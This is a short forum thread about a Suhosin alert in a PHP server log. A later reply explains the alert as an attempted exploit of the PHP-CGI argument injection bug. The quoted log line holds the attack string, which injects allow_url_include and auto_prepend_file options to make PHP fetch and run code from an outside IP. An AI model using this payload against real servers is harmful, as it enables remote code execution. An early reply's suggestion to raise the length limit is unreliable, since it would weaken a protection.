suhosin - user.log

  • Moin,

    I found this in my user.log

    1. <time> <myserver> suhosin[17870]: ALERT - configured request variable name length limit exceeded - dropped variable '-d_allow_url_include=On_-d_auto_prepend_file=http://109_68_72_95/icons/api_gif_-n/?-d_allow_url_include=On_-d_auto_prepend_file=http://109_68_72_95/icons/api_gif_-n' (attacker '', file '/var/www/imscp/gui/public/index.php')

    anyone could explain, what happened here?

    OS: debian GNU/Linux Squeeze
    PHP 5.3.3-7+squeeze9 with Suhosin-Patch (cli) (built: May 8 2012 10:41:34)


  • Hello Tom

    I think your var-name is too long. Please check this settings:

    in the suhosin.ini file.

    Default value is 64 I think. Change it to the needed values.


  • Just a note, suhosin won't be supported in debian wheezy, and removed from the default install.

  • Anway, this has a very easy explanation: a hacker tried to exploit a recently discovered php bug when php runs as a CGI applicaiton.

    If your server had been using an older (unpatched) php release, and it had been running in CGI mode, the result would be your server downloading the contents of an external file and executing if it was part of your website.

    However, the URL the hacker constructed for the attack was too long for php's suoshin query lenght limit, so it stopped the request and logged the error.

    Anyway, even if you did not have suoshin enabled, that would not have been a problem, for two reasons:

    (1) The debian's included php was patched as soon as the php guys released a fix for this bug. If you have your system up to date, php simply doesn't contain this bug anymore.
    (2) The bug only works when php is run as CGI. In imscp you can choose to run php in fastcgi mode (with mod_fcgid or mod_fastcgi) or in embedded mode (with mod_php), but not in CGI mode. This decision was made purely by performance reasons (php as CGI is SLOW because a different php interpret has to be executed for each request).